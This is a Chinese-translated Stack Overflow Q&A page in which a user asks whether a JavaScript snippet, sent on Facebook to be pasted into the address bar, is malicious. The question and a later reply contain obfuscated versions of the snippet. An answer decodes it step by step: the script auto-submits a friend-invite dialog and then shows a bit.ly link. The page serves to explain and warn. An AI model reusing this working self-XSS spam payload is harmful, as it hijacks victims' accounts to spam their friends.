1. 首頁
  2. 問答
  3. 地址欄中的Javascript - 是否是惡意的?

地址欄中的Javascript - 是否是惡意的?

2010-04-14 51 views
7

我在Facebook上收到一條消息,要求我將其複製並粘貼到我的地址欄中。我想我會在這裏發佈,看看大家對它的看法。它有什麼作用?它是如何工作的?地址欄中的Javascript - 是否是惡意的?

這裏的源代碼:

// (DO NOT DO THIS!) 
Javascript:var a=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x32\x36\x38\x32\x36\x39\x35\x34\x31\x38\x35\x32\x33\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"]; 
void (document[a[2]](a[1])[a[0]]=a[3]);var ss=document[a[2]](a[4]); 
var c=document[a[6]](a[5]); 
c[a[8]](a[7],true,true); 
void (ss[a[9]](c)); 
void (setTimeout(function(){fs[a[10]]();} ,4000)); 
void (setTimeout(function(){SocialGraphManager[a[13]](a[11],a[12]);} ,5000)); 
void (setTimeout(function(){ 
document[a[2]](a[1])[a[0]]="\x3C\x61\x20\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x62\x54\x6C\x30\x76\x6A\x27\x3E\x43\x6F\x6D\x70\x6C\x65\x74\x65\x64\x21\x20\x43\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E"; 
} ,5400));

來源

2010-04-14 David

+2

看起來合法:) – ChaosPandion 2010-04-14 00:38:34

+0

它是做什麼的? – David 2010-04-14 00:39:33

+0

可能重複[Javascript編譯或不?檢查裏面....](http://stackoverflow.com/questions/2613986/javascript-compiled-or-not-check-inside) – meagar 2010-05-13 13:33:53

回答

21

這裏是格式化的源:

var a = ["innerHTML", 
     "app4949752878_app4949752878_dd", 
     "getElementById", 
     "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>", 
     "suggest", 
     "MouseEvents", 
     "createEvent", 
     "click", 
     "initEvent", 
     "dispatchEvent", 
     "select_all", 
     "sgm_invite_form", 
     "/ajax/social_graph/invite_dialog.php", 
     "submitDialog"]; 

void (document[a[2]](a[1])[a[0]] = a[3]); 
var ss = document[a[2]](a[4]); 
var c = document[a[6]](a[5]); 
c[a[8]](a[7], true, true); 
void ss[a[9]](c); 
void setTimeout(function() {fs[a[10]]();}, 4000); 
void setTimeout(function() {SocialGraphManager[a[13]](a[11], a[12]);}, 5000); 
void setTimeout(function() {document[a[2]](a[1])[a[0]] = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";}, 5400);

a陣列保存由代碼使用的所有字符串。
這與到位放回字符串:

void (document.getElementById('app4949752878_app4949752878_dd').innerHTML = "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>"); 
var ss = document.getElementById("suggest"); 
var c = document.createEvent("MouseEvents"); 
c.initEvent("click", true, true); 
void ss.dispatchEvent(c); 
void setTimeout(function() {fs.select_all();}, 4000); 
void setTimeout(function() { 
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php"); 
}, 5000); 
void setTimeout(function() { 
    document.getElementById('app4949752878_app4949752878_dd').innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>"; 
}, 5400);

最後,在這裏它與體面的名稱和結構:

var messageElement = document.getElementById('app4949752878_app4949752878_dd'); 

messageElement.innerHTML = 
    "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>"; 

var suggestLink = document.getElementById("suggest"); 
var mouseEvent = document.createEvent("MouseEvents"); 
mouseEvent.initEvent("click", true, true); 
suggestLink.dispatchEvent(mouseEvent); 


setTimeout(function() { fs.select_all(); }, 4000); 
setTimeout(function() { 
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php"); 
}, 5000); 
setTimeout(function() { 
    messageElement.innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>"; 
}, 5400);

來源

2010-04-14 00:40:02 SLaks

+0

謝謝。這是有幫助的。它雖然做了什麼? – David 2010-04-14 00:40:36

+0

請稍候,我正在翻譯它。 – SLaks 2010-04-14 00:41:09

+0

當然。感謝你這樣做。 – David 2010-04-14 00:41:27

4

我總是覺得這種有趣的事情,因爲它表明各人們用來試圖繞過安全或者誘使他人去做一些愚蠢的事情。

我的「黃金法則」就是這樣的事情總是非常狡猾,最好被忽視。沒有合法的東西需要這種黑客攻擊,至少它可能違反了一些網站策略。在最糟糕的情況下,您會遭到黑客入侵,您的計算機或在線身份被濫用或您的銀行賬戶被耗盡。

來源

2010-04-14 01:49:54 drekka

0

非常有趣。你是怎麼解碼它的?

我剛剛得到了類似的內容,但它看起來不是同一類型的內容。部分代碼(後半部分)如下。我不知道我是否應該粘貼整個代碼。新手在這裏。

(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();

來源

2010-05-10 04:21:33

相關問題

 相關問題